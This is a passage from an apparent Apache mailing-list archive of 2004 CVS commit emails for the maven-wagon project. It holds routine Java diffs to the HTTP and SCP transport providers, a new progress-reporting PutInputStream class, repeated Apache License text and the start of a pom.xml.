text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 1.8 +38 -5 maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http/HttpWagon.java Index: HttpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http/HttpWagon.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- HttpWagon.java 26 May 2004 16:47:16 -0000 1.7 +++ HttpWagon.java 3 Jun 2004 18:31:26 -0000 1.8 @@ -104,6 +104,7 @@ client.getState().setProxyCredentials( null, proxyHost, creds ); } } + hc.setHost( host ); //start a session with the webserver @@ -126,10 +127,15 @@ try { - putMethod.setRequestBody( new FileInputStream( source ) ); + + InputStream is = new PutInputStream( source, resource, this, getTransferEventSupport() ); + + putMethod.setRequestBody( is ); } catch ( FileNotFoundException e ) { + fireTransferError( resource, e ); + throw new ResourceDoesNotExistException( "Source file does not exist: " + source, e ); } @@ -144,7 +150,12 @@ { try { + firePutStarted( resource, source ); + statusCode = client.executeMethod( putMethod ); + + firePutCompleted( resource, source ); + } catch ( HttpRecoverableException e ) { @@ -166,6 +177,9 @@ case HttpStatus.SC_OK: break; + case HttpStatus.SC_CREATED: + break; + case SC_NULL: throw new ResourceDoesNotExistException( "File: " + url + " does not extist" ); @@ -181,6 +195,8 @@ } putMethod.releaseConnection(); + + firePutCompleted( resource, source ); } public void closeConnection() @@ -275,15 +291,32 @@ is = getMethod.getResponseBodyAsStream(); - getTransfer( resource, is, os, destination ); + getTransfer( resource, destination, is, os); } catch ( Exception e ) { - throw new TransferFailedException( "Cannot transfer!", e ); + fireTransferError( source.getName(), e ); + + if ( destination.exists() ) + { + boolean deleted = destination.delete(); + + if ( ! deleted ) + { + destination.deleteOnExit(); + } + } + + String msg = "Error occured while deploying to remote repository:" + getRepository(); + + + throw new TransferFailedException( msg, e ); } finally { - closeTransferStreams( is, os ); + shutdownStream( is ); + + shutdownStream( os ); } getMethod.releaseConnection(); 1.1 maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http/PutInputStream.java Index: PutInputStream.java =================================================================== package org.apache.maven.wagon.providers.http; /* ==================================================================== * Copyright 2001-2004 The Apache Software Foundation. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * ==================================================================== */ import org.apache.maven.wagon.events.TransferEventSupport; import org.apache.maven.wagon.events.TransferEvent; import org.apache.maven.wagon.Wagon; import java.io.FileInputStream; import java.io.File; import java.io.FileNotFoundException; import java.io.IOException; /** * * * @author <a href="[email protected]">Michal Maczka</a> * @version $Id: PutInputStream.java,v 1.1 2004/06/03 18:31:26 michal Exp $ */ public class PutInputStream extends FileInputStream { private TransferEventSupport eventSupport; private TransferEvent event; public PutInputStream( File file, String resource, Wagon wagon, TransferEventSupport eventSupport ) throws FileNotFoundException { super(file); this.eventSupport = eventSupport; event = new TransferEvent( wagon, resource, TransferEvent.TRANSFER_PROGRESS, TransferEvent.REQUEST_PUT ); event.setLocalFile( file ); } public int read( byte b[] ) throws IOException { return read( b, 0, b.length ); } public int read() throws IOException { byte b[] = new byte[ 1 ]; return read( b ); } public int read( byte b[], int off, int len ) throws IOException { int retValue = super.read(b, off, len); event.setTimestamp( System.currentTimeMillis() ); event.setData( b, retValue ); eventSupport.fireTransferProgress( event ); return retValue; } } 1.5 +6 -7 maven-wagon/wagon-providers/http/src/test/java/org/apache/maven/wagon/providers/http/HttpWagonTest.java Index: HttpWagonTest.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/http/src/test/java/org/apache/maven/wagon/providers/http/HttpWagonTest.java,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- HttpWagonTest.java 21 May 2004 16:48:54 -0000 1.4 +++ HttpWagonTest.java 3 Jun 2004 18:31:26 -0000 1.5 @@ -17,6 +17,7 @@ */ import org.apache.maven.wagon.WagonTestCase; +import org.apache.maven.wagon.FileTestUtils; import org.apache.maven.wagon.artifact.Artifact; import org.apache.maven.wagon.repository.Repository; import org.codehaus.plexus.jetty.Httpd; @@ -57,15 +58,13 @@ // File round trip testing - System.out.println( "basedir:" + basedir ); - - File file = new File( basedir, "/target/http-repository/test-resource.txt" ); + File file = FileTestUtils.createUniqueFile( "test-resource" ) ;//new File( basedir, "/target/http-repository/test-resource.txt" ); file.delete(); file.getParentFile().mkdirs(); - generateFile( file.getAbsolutePath(), "file-dummy" ); + FileTestUtils.generateFile( file.getAbsolutePath(), "file-dummy" ); // For a PUT the artifact must exist already which is how a PUT works by // default so we must place a dummy artifact in the http repo first before @@ -74,13 +73,13 @@ // Artifact round trip testing Artifact artifact = getTestArtifact(); - File f = new File( basedir, "/target/http-repository/" + new Repository().artifactPath( artifact ) ); + File f = new File( FileTestUtils.createDir( "http-repository"), new Repository().artifactPath( artifact ) ); f.delete(); f.getParentFile().mkdirs(); - generateFile( f.getAbsolutePath(), "aritfact-dummy" ); + FileTestUtils.generateFile( f.getAbsolutePath(), "aritfact-dummy" ); httpd = (Httpd) lookup( Httpd.ROLE ); } 1.1 maven-wagon/wagon-providers/http/license.txt Index: license.txt =================================================================== Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 1.7 +60 -43 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java Index: ScpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- ScpWagon.java 26 May 2004 16:47:04 -0000 1.6 +++ ScpWagon.java 3 Jun 2004 18:31:26 -0000 1.7 @@ -51,9 +51,7 @@ * work then we fall back to using the login and password * * @version $Id$ - * @todo still have to account for differing setups for people - * deploying to their own sites and to the central repository. @todo - * improve exception handling + * */ public class ScpWagon extends AbstractWagon @@ -132,6 +130,7 @@ if ( proxyInfo != null && proxyInfo.getHost() != null ) { Proxy proxy; + int proxyPort = proxyInfo.getPort(); // HACK: @@ -195,7 +194,7 @@ session.disconnect(); } - protected void executeSimpleCommand( Session session, String command ) + public void executeSimpleCommand( String command ) throws TransferFailedException { ChannelExec channel = null; @@ -230,7 +229,7 @@ { String mkdirCmd = "mkdir -p " + getRepository().getBasedir() + "/" + PathUtils.dirname( resource ) + "\n"; - executeSimpleCommand( session, mkdirCmd ); + executeSimpleCommand( mkdirCmd ); ChannelExec channel = null; @@ -261,7 +260,8 @@ if ( checkAck( in ) != 0 ) { - System.exit( 0 ); + + throw new TransferFailedException( "ACK check failed" ); } // send "C0644 filesize filename", where filename should not include '/' @@ -277,21 +277,31 @@ if ( checkAck( in ) != 0 ) { - System.exit( 0 ); + String msg = "Error occured while deploying '" + + resource + "' to remote repository '" + + getRepository().getUrl() + + "' - Wrong ACK "; + + throw new TransferFailedException( msg ); } // send a content of lfile FileInputStream fis = new FileInputStream( source ); - byte[] buf = new byte[1024]; + putTransfer( resource, source, fis, out, false ); - while ( true ) - { - int len = fis.read( buf, 0, buf.length ); - if ( len <= 0 ) break; - out.write( buf, 0, len ); - out.flush(); - } + byte[] buf = new byte[1024]; +// +// while ( true ) +// { +// int len = fis.read( buf, 0, buf.length ); +// +// if ( len <= 0 ) break; +// +// out.write( buf, 0, len ); +// +// out.flush(); +// } // send '\0' buf[0] = 0; @@ -302,11 +312,17 @@ if ( checkAck( in ) != 0 ) { + String msg = "Error occured while deploying '" + + resource + "' to remote repository '" + + getRepository().getUrl() + + "' - Wrong ACK "; + + throw new TransferFailedException( msg ); } } - catch ( Exception e ) + catch ( Exception e ) { - String msg = "Error occured while deploying to remote repository: " + getRepository(); + String msg = "Error occured while deploying '" + resource + "' to remote repository: " + getRepository().getUrl(); throw new TransferFailedException( msg, e ); } @@ -317,7 +333,7 @@ { String chgrpCmd = "chgrp " + authInfo.getGroup() + " " + getRepository().getBasedir() + "/" + resource + "\n"; - executeSimpleCommand( session, chgrpCmd ); + executeSimpleCommand( chgrpCmd ); // Need to change the mode as well. @@ -343,7 +359,7 @@ ChannelExec channel = null; //I/O streams for remote scp - OutputStream out; + OutputStream out = null; InputStream in = null; @@ -401,9 +417,11 @@ for ( int i = 0; ; i++ ) { in.read( buf, i, 1 ); + if ( buf[i] == (byte) 0x0a ) { file = new String( buf, 0, i ); + break; } } @@ -416,36 +434,17 @@ out.flush(); // read a content of lfile - LazyFileOutputStream fos = new LazyFileOutputStream( destination ); - - int foo; - - while ( true ) - { - if ( buf.length < filesize ) - { - foo = buf.length; - } - else - { - foo = filesize; - } - - in.read( buf, 0, foo ); - - fos.write( buf, 0, foo ); - - filesize -= foo; + LazyFileOutputStream outputStream = new LazyFileOutputStream( destination ); - if ( filesize == 0 ) break; - } + getTransfer( resource, destination, in, outputStream); - fos.close(); byte[] tmp = new byte[1]; if ( checkAck( in ) != 0 ) { + + } // send '\0' @@ -460,12 +459,30 @@ { fireTransferError( source.getName(), e ); + if ( destination.exists() ) + { + boolean deleted = destination.delete(); + + if ( ! deleted ) + { + destination.deleteOnExit(); + } + } + String msg = "Error occured while deploying to remote repository:" + getRepository(); + throw new TransferFailedException( msg, e ); + + + } finally { + if ( out != null) + { + shutdownStream( out ); + } if ( channel != null ) { channel.disconnect(); 1.1 maven-wagon/wagon-providers/ssh/license.txt Index: license.txt =================================================================== Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 03 20:04:01 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54684 invoked from network); 3 Jun 2004 20:03:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Jun 2004 20:03:59 -0000 Received: (qmail 81137 invoked by uid 500); 3 Jun 2004 20:04:14 -0000 Delivered-To: [email protected] Received: (qmail 80994 invoked by uid 500); 3 Jun 2004 20:04:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 80950 invoked by uid 99); 3 Jun 2004 20:04:11 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Thu, 03 Jun 2004 13:04:11 -0700 Received: (qmail 54530 invoked by uid 1668); 3 Jun 2004 20:03:46 -0000 Date: 3 Jun 2004 20:03:46 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers ChecksumObserver.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/03 13:03:46 Modified: wagon-api/src/main/java/org/apache/maven/wagon/observers ChecksumObserver.java Log: removed debug info Revision Changes Path 1.3 +4 -2 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/ChecksumObserver.java Index: ChecksumObserver.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/ChecksumObserver.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- ChecksumObserver.java 3 Jun 2004 18:26:59 -0000 1.2 +++ ChecksumObserver.java 3 Jun 2004 20:03:46 -0000 1.3 @@ -176,7 +176,9 @@ } catch ( Exception e ) { - e.printStackTrace(); + //@todo maybe some information should be added to log? + // ignore this + // e.printStackTrace(); } finally { --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 09 03:11:33 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63180 invoked from network); 9 Jun 2004 03:11:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Jun 2004 03:11:33 -0000 Received: (qmail 525 invoked by uid 500); 9 Jun 2004 03:11:55 -0000 Delivered-To: [email protected] Received: (qmail 498 invoked by uid 500); 9 Jun 2004 03:11:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 481 invoked by uid 99); 9 Jun 2004 03:11:54 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 08 Jun 2004 20:11:54 -0700 Received: (qmail 63139 invoked by uid 1162); 9 Jun 2004 03:11:23 -0000 Date: 9 Jun 2004 03:11:23 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh pom.xml project.properties project.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N jvanzyl 2004/06/08 20:11:23 Modified: wagon-api/src/main/java/org/apache/maven/wagon WagonTestCase.java wagon-api/src/test/java/org/apache/maven/wagon AbstractWagonTest.java Added: . pom.xml wagon-ant pom.xml wagon-api pom.xml wagon-providers/ftp pom.xml wagon-providers/http pom.xml wagon-providers/ssh pom.xml Removed: . project.properties project.xml wagon-ant project.xml wagon-api project.properties project.xml repositories.xml wagon-providers/ftp project.properties project.xml wagon-providers/http project.properties project.xml wagon-providers/ssh project.properties project.xml Log: o doing the pom.xml thing Revision Changes Path 1.1 maven-wagon/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <pomVersion>3</pomVersion> <groupId>maven</groupId> <artifactId>wagon</artifactId> <name>Wagon</name> <currentVersion>0.9-SNAPSHOT</currentVersion> <description></description> <shortDescription>Tools to manage artifacts and deployment</shortDescription> <package>org.apache.maven.wagon</package> <inceptionYear>2003</inceptionYear> <organization> <name>Apache Software Foundation</name> <url>http://www.apache.org/</url> <logo>http://maven.apache.org/images/apache-maven-project.png</logo> </organization> <mailingLists> <mailingList> <name>Wgaon User List</name> <subscribe>[email protected]</subscribe> <unsubscribe>[email protected]</unsubscribe> <archive>http://[email protected]</archive> </mailingList> <mailingList> <name>Wagon Developer List</name> <subscribe>[email protected]</subscribe> <unsubscribe>[email 